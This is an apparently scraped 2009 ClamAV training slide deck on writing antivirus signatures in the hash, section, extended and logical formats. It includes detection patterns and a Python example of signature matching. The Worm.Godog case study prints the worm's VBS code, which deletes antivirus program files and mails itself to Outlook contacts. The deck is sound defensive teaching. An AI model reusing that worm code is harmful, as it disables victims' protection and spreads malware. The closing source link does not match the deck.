Clamav signatures

Writing ClamAV Signatures - Alain Zidouemba, March 4, 2009


7/30/2019 Clamav signatures

http://slidepdf.com/reader/full/clamav-signatures 1/35

Writing ClamAV Signatures

Alain Zidouemba, March 4, 2009


About the presenter

Alain Zidouemba

• VRT Research Engineer for over a year

• Primary responsibilities:

  • Malware research & signature generation – ClamAV

  • Vulnerability research & rules generation – Snort

• Before Sourcefire: Anti-Malware Research Engineer


Outline

What is ClamAV

Where to get ClamAV

Different ClamAV signature formats:

• .hdb

• .mdb

• .ndb

• .ldb

Whitelisting

Q & A


ClamAV


What is ClamAV?

Clam AntiVirus (ClamAV) is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways.

Provides a number of utilities including:

• A flexible and scalable multi-threaded daemon (clamd)

• A command line scanner (clamscan)

• An advanced tool for automatic database updates (freshclam)

• Sigtool – more later


Where can I get ClamAV from?

Latest stable release: ClamAV 0.94.2

• http://www.clamav.net/download/sources

Most popular UNIX operating systems are supported:

• GNU/Linux, Solaris, FreeBSD, OpenBSD, Mac OS X

An up-to-date list of binary packages is available at our website:

http://clamav.net/download/packages


Why learn how to write sigs?

I thought Sourcefire released signature updates several times a day!


ClamAV malware detection

Goal: recognize and block malware

Detection is:

• File-centric

• Focus on recognizing malicious code in a file

Not intended to replace desktop AV

First line of defense


ClamAV Virus Database (CVD)

The ClamAV project distributes two CVD files:

• main.cvd

• daily.cvd

Sigtool (ships with ClamAV) can display detailed information on CVD files.


Various signature files in the .cvd archive


Writing signatures for ClamAV


Hash database: *.hdb

The format for .hdb files is as follows:

• MD5:Size:MalwareName

To create a signature for test.exe, use the --md5 option of sigtool.


Hash database: *.hdb (cont’d)

That’s it! The signature is ready to be used.

• The name for the detection can be changed.


MD5, PE-section based: *.mdb

The format for .mdb files is as follows:

• PESectionSize:MD5:MalwareName

The easiest way to generate MD5-based section signatures is to extract the target PE sections into separate files and then run sigtool with the --mdb option.


Case study: Trojan.Bagle-328

IDA Pro indicates that the sample is “packed”  

Packed with Themida (as per PEiD)


Case study: Trojan.Bagle-328 (cont’d)

Themida is used by malware writers... but also by legitimate products – false positive likely

We can use pe-sig, a Ruby script that will create sigs for each section of a PE file.

Finally, the signature is:

• 237568:ce914ca1bbea795a7021854431663623:Trojan.Bagle-328


Extended sig. format: *.ndb

The format for .ndb files is as follows:

• MalwareName:TargetType:Offset:HexSignature

TargetType is one of the following numbers specifying the type of the target file:

0: Any file

1: Portable Executable

2: OLE2 component (e.g. VBA script)

3: HTML (normalized)

4: Mail file

5: Graphics

6: ELF

7: ASCII text file (normalized)


Case study: Trojan.Exchanger 

Many files that are very similar yet different


Case study: Trojan.Exchanger (cont’d) 

5.exe:

Opcode: e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4

Signature: Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4


Case study: Trojan.Exchanger (cont’d) 

7.exe:

Opcode: e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4

Signature: Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4


Case study: Trojan.Exchanger (cont’d) 

Signature for 5.exe:

• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4

Signature for 7.exe:

• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4

Signature to detect both 5.exe and 7.exe:

• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4


Case study: Trojan.Exchanger (cont’d) 

Moreover, for 5.exe:

• EP: 0x4094E0

• Binary string: 0x4095C5

For 7.exe:

• EP: 0x406D87

• Binary string: 0x406E6C

In both cases the distance between EP and our binary string is the same: 0xE5 = 229 (decimal)


Case study: Trojan.Exchanger (cont’d) 

Finally we can rewrite the signature to be:

• Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4

This signature is more precise and even matches other samples.


Logical signatures: *.ldb

Logical signatures were introduced in ClamAV 0.94. The format for .ldb files is as follows:

• SignatureName;TargetDescriptionBlock;LogicalExpression;Subsig0;Subsig1;Subsig2;...


Case study: Worm.Godog

 A mass-mailer worm, code is in VBS

Registro = legion.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")

If FileExists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\Avp32.exe") then path = Registro &"\Kaspersky Lab\Kaspersky Antivirus Personal Pro"

legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\*.*")

If fileexists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\Avp32.exe") then path = Registro &"\Kaspersky Lab\Kaspersky Antivirus Personal"

legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\*.*")

if FileExists(Registro & "\Antiviral Toolkit Pro\avp32.exe") then path = Registros & "\Antiviral Toolkit Pro"

legions.DeleteFile (Registro & "\Antiviral Toolkit Pro\*.*")

if fileexists (Registro & "\AVPersonal\Avguard.exe") then path = Registro & "\AVPersonal"

legions.DeleteFile (Registro & "\AVPersonal\*.*")

if fileexists (Registro & "\Trend PC-cillin 98\IOMON98.EXE") then path = Registro & "\Trend PC-cillin 98"

legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.*")

legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.EXE")

legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.dll")


Case study: Worm.Godog (cont’d)

After normalization, we can create 4 signatures to detect each attempt to disable AV tools as follows:

(0) Kaspersky Antivirus Personal/Kaspersky Antivirus Personal Pro: 66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c

(1) Antiviral Toolkit Pro: 66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f

(2) AVPersonal: 66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c

(3) Trend PC-cillin 98: 66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e


Case study: Worm.Godog (cont’d)

The worm also sends itself to the first 8000 contacts found in the address book:

Set Create = CreateObject ("Scripting.FileSystemObject")

Set mail = Create.CreateTextFile("C:\mail.vbs")

mail.writeline "On Error Resume Next"

mail.writeline "Dim leg, Mail, Counter, A, B, C, D, E"

mail.writeline "Set leg = CreateObject" & Chr(32)& "(" & chr(34) & "Outlook.Application" & Chr(34) &")"

mail.writeline "Set C = CreateObject "& Chr(32) & "(" & chr(34) & "Scripting.FileSystemObject" & Chr(34)& ")"

mail.writeline "Set Mail = leg.GetNameSpace" & Chr(32) & "(" & chr(34)& "MAPI" & Chr(34)&")"

mail.writeline "For A = 1 To Mail.AddressLists.Count"

mail.writeline "Set B = Mail.AddressLists (A)"

mail.writeline "Counter = 1"

mail.writeline "Set C = leg.CreateItem (0)"

mail.writeline "For D = 1 To B.AddressEntries.Count"

mail.writeline "E = B.AddressEntries (Counter)"

mail.writeline "C.Recipients.Add E"

mail.writeline "Counter = Counter + 1"

mail.writeline "If Counter > 8000 Then Exit For"

mail.writeline "Next"

mail.writeline "C.Subject =" & Chr(32) & Chr(34) &"Legion Game" & Chr(34)

mail.writeline "C.Body = "& Chr(32) & Chr(34) & "YA jugaste el juego Legion? si no aqui te lo doy checalo y hay me dices que tal..." & Chr(34)

mail.writeline "C.Attachments.Add"& Chr(32) & Chr(34) & "C:\Legion.vbs" & Chr(34)

mail.writeline "C.DeleteAfterSubmit = True"

mail.writeline "C.Send"

mail.writeline "Next"

mail.Close

legion.Run ("C:\mail.vbs")


Case study: Worm.Godog (cont’d)

A signature to detect this portion of the worm could be:

(4) 666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64

Finally, we can write this highly flexible signature:

• Worm.Godog;Target:0;((0|1|2|3)&(4));(0);(1);(2);(3);(4)

in a .ldb file:

Worm.Godog;Target:0;((0|1|2|3)&(4));66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c;66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f;66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c;66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e;666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64
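The matching logic behind the .ndb case study (hex body with a {4} wildcard, EP+229 offset) and behind this .ldb signature, as an added Python example that is not code from the slides or from ClamAV itself: hex bodies become byte regexes, the EP-relative offset is applied to a caller-supplied entry point, and the logical expression is evaluated over the subsignature hits. The sample buffers, the entry-point value and the normalized VBS fragment are constructed for the demonstration; ClamAV's own text normalization and PE parsing are assumed to have happened beforehand.

```python
import re
# Compile a ClamAV hex-signature body (.ndb body or .ldb subsignature) into a bytes regex.
# Wildcards from the slides: {n} exactly n bytes, {-n} up to n, {n-} at least n, {n-m} n..m bytes.
def hexsig_to_regex(sig):
    parts, i = [], 0
    while i < len(sig):
        if sig[i] == '{':
            j = sig.index('}', i)
            lo, dash, hi = sig[i + 1:j].partition('-')
            parts.append(b'.{%s,%s}' % ((lo or '0').encode(), (hi if dash else lo).encode()))
            i = j + 1
        else:
            parts.append(b'\\x' + sig[i:i + 2].encode())  # one literal byte, e.g. \xe8
            i += 2
    return re.compile(b''.join(parts), re.DOTALL)

# One .ndb line (MalwareName:TargetType:Offset:HexSig) with offset '*' (anywhere) or 'EP+n'.
# Assumption: the caller parsed the PE entry point from the header and passes its file offset as ep.
def ndb_match(line, data, ep=None):
    _name, _target, offset, body = line.split(':', 3)
    pat = hexsig_to_regex(body)
    if offset == '*':
        return pat.search(data) is not None
    if ep is None:  # EP-relative signature but no entry point known (e.g. not a PE): cannot fire
        return False
    return pat.match(data, ep + int(offset[3:])) is not None

# One .ldb line (Name;TargetDescription;LogicalExpression;Subsig0;Subsig1;...). Assumption: the
# expression uses only subsig indices, |, & and parentheses (ClamAV's =,<,> count operators omitted).
def ldb_match(line, data):
    _name, _target, expr, *subsigs = line.split(';')
    hits = [hexsig_to_regex(s.strip()).search(data) is not None for s in subsigs]
    py = re.sub(r'\d+', lambda m: str(hits[int(m.group())]), expr)
    py = py.replace('&', ' and ').replace('|', ' or ')
    if not re.fullmatch(r'[\s()TrueFalsandor]+', py):
        raise ValueError('unsupported logical expression: ' + expr)
    return bool(eval(py, {'__builtins__': {}}, {}))
# Constructed inputs (not real samples): the Trojan.Exchanger opcode runs from the slides placed
# 229 bytes after a made-up entry point, and a normalized (lowercase) VBS fragment hitting Godog subsigs (2) and (4) only.
EP = 0x40
EXCHANGER = 'Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4'
SAMPLE_5 = b'\x90' * (EP + 229) + bytes.fromhex('e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4')
SAMPLE_7 = b'\x90' * (EP + 229) + bytes.fromhex('e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4')
GODOG = ('Worm.Godog;Target:0;((0|1|2|3)&(4));'
         '66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c;'
         '66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f;'
         '66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c;66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e;'
         '666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64')
GODOG_TEXT = (b'if fileexists (registro & "\\avpersonal\\avguard.exe") then path = registro & "\\avpersonal"\nlegions.deletefile (registro & "\\avpersonal\\*.*")\n'
              b'for d = 1 to b.addressentries.count\nc.recipients.add e\nif counter > 8000 then exit for\nc.attachments.add "c:\\legion.vbs"\nc.send\n')
```

The same {4} body matches both opcode runs only when the entry point is supplied and the signature is tested at EP+229; at any other offset, or on a non-PE input with no entry point, it does not fire.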


Whitelisting

To whitelist a specific file, create an entry in a database file with the extension .fp following the MD5 signature format:

• MD5:FileSize:Comment


Whitelisting (cont’d)  

To whitelist a specific signature inside main.cvd, add the following entry into a local file local.ign:

• db_name:line_number:signature_name

To ignore the “myTestSignature” at line 23 in test.ndb:

• test.ndb:23:myTestSignature

Daily.ign:


More questions?

[email protected] - user questions 

[email protected] - technical discussions

Alternatively you can try asking on the #clamav IRC channel on irc.freenode.net

If you have questions or comments on this presentation: [email protected]


ClamAV/VRT/Sourcefire

Websites

• http://www.clamav.net

• http://www.snort.org

• http://www.sourcefire.com

Blogs

• http://clam-av.blogspot.com

• http://vrt-sourcefire.blogspot.com


Contribute

Sample submission

• http://www.clamav.net/sendvirus/

Upload statistics:

• freshclam --submit-stats

Bug submission

• http://bugs.clamav.net


Q & A


NOW GO AND WRITE SIGNATURES!

Source: http://www.topnews.in/wireless-worms-may-spread-same-manner-flu-222714